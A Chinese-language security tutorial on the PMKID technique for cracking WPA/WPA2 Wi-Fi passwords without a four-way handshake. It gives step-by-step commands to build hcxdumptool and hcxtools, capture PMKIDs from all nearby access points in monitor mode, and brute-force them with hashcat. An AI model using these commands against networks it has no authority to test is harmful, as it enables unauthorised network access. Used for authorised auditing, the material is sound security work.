無需四次握手包破解WPA&WPA2密碼

知名密碼破解軟體Hashcat在2018年8月2日發布了4.2版本

，這次版本更新的主要內容是增加了4個新的密碼演算法支持。

其中的WPA-PMKID-PBKDF2演算法，是為了支持一種新的WAP預共享密鑰密碼破解方法。

New attack on WPA/WPA2 using PMKID

根據Hashcat官方論壇文章介紹，作者在研究WPA3安全標準時，意外發現的使用PMKID破解WPA預共享密鑰的方法，與現有的其它破解方法不同，該方法不再需要抓取完整的EAPOL四次握手包，只需要一個EAPOL幀中的RSN IE(Robust Security Network Information Element)即可。目前，作者尚不清楚該攻擊方法對哪些路由器生效，但仍認為可以有效的攻擊所有啟用了漫遊功能的802.11i/p/q/r網路（大部分較新的路由器都支持）。

該方法注意的優勢如下：

1.攻擊者直接與AP通信，無需普通用戶參與（即「無客戶端」攻擊）；

2.無需等待普通用戶與AP完成四次握手；

3.無需重傳EAPOL幀（重傳可能導致無法破解）；

4.無需普通用戶發送無效密碼；

5.不再會因為攻擊者離AP或普通用戶太遠丟失EAPOL幀；

6.無需修復nonce和replaycounter值；

7.無需特定的輸出格式，最終數據以16進位編碼字元串呈現。

相關工具

該攻擊方法需要用到以下幾個工具：

1.hcxdumptool v4.2.0 or higher；

2.用於抓包並保存為Hashcat破解可用的格式；

3.支持的無線網卡：

USB ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter

USB ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter

USB ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter

USB ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter

USB ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter

hcxtools v4.2.0 or higher

hashcat v4.2.0 or higher

實戰演示

本次演示環境：

Kali 2018.3(Linux內核版本4.17) + Tenda W311M無線網卡(MT7601U)

編譯安裝相關工具

hcxdumptool

下載源碼編譯(使用root運行，Linux內核版本>=4.14)
https://github.com/ZerBea/hcxdumptool/archive/4.2.0.tar.gz
tarf -xvf 4.2.0.tar.gz
cd hcxdumptool-4.2.0
make && make install
# 編譯完成後的工具均安裝在/usr/local/bin/目錄下

hcxtools

# 安裝依賴軟體包，解決編譯報錯
apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev
#下載源碼編譯(使用root運行)
wget https://github.com/ZerBea/hcxtools/archive/4.2.0.tar.gz
tar -xvf 4.2.0.tar.gz
cd hcxtools-4.2.0
make && make install
# 編譯完成後的工具均安裝在/usr/local/bin/目錄下。

Hashcat

官方提供已編譯好的二進位文件，包含Windows及Linux版本，下載解壓即可。

# 下載Hashcat 4.2
wget https://hashcat.net/files/hashcat-4.2.0.7z
# 解壓
7z x hashcat-4.2.0.7z

PMKID介紹

RSN IE(Robust Security Network Information Element)是8.2.11管理幀中的一個可選欄位，其中的一個信息元素就是PMKID。

PMKID使用HMAC-SHA1演算法計算得到，密鑰為PMK，數據部分由固定的字元串標籤「PMK Name」、AP的MAC地址及基站的MAC地址拼接組成，計算公式如下：

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

因為PMK和普通的四次握手中的相同，因此PMKID是一個理想的攻擊向量，破解所需的所有信息都可以從接收到的AP第一個EAPOL幀中得到。

抓取PMKID

hcxdumptool可以從AP請求PMKID並保存接收到的數據幀到文件中（pcapng格式）。

# 使用網卡wlan0，開啟Monitor模式，
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up
# 查看可用的無線網卡
hcxdumptool -I
# 抓取管理幀和EAP/EAPOL幀，保存文件為pmkid.pacpng，開啟狀態顯示
# 未添加AP過濾時，攻擊端將對所有掃描到的AP發送協商請求。
hcxdumptool -o pmkid.pacpng -i wlan0 --enable_status

如果AP接受到攻擊端的協商請求包並支持發送PMKID，過一會兒將看到「FOUND PMKID」的提示。

由於Wifi信道干擾等原因，可能需要過一段時間才能接收到PMKID，在你放棄前，建議耐心的等上10分鐘。

數據格式轉換

抓取的PMKID後，使用hcxpcaptool工具轉換成Hashcat支持的格式。

$ ./hcxpcaptool -z pmkid.16800 pmkid.pcapng

轉換後的文件內容：

以*符號分割的4列內容分別是：

1.PMKID

2.MAC AP

3.MAC Station

4.ESSID

通過MAC AP，可以查找到對應的WIFI名稱。

密碼破解

接下來，使用Hashcat破解抓取到的PMKID內容。

# 指定hash模式為16800，使用暴力破解方式，設置掩碼為8個數字
hashcat -m 16800 pmkid.16800 -a 3 -w 3 "?d?d?d?d?d?d?d?d"

順利的話，你將看到這樣的結果，密碼破解成功：

相關鏈接

Hashcat v4.2.0 https://hashcat.net/forum/thread-7711.html

New attack on WPA/WPA2 using PMKID https://hashcat.net/forum/thread-7717.html

*本文原創作者：Shad0wpf_，本文屬FreeBuf原創獎勵計劃，未經許可禁止轉載

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！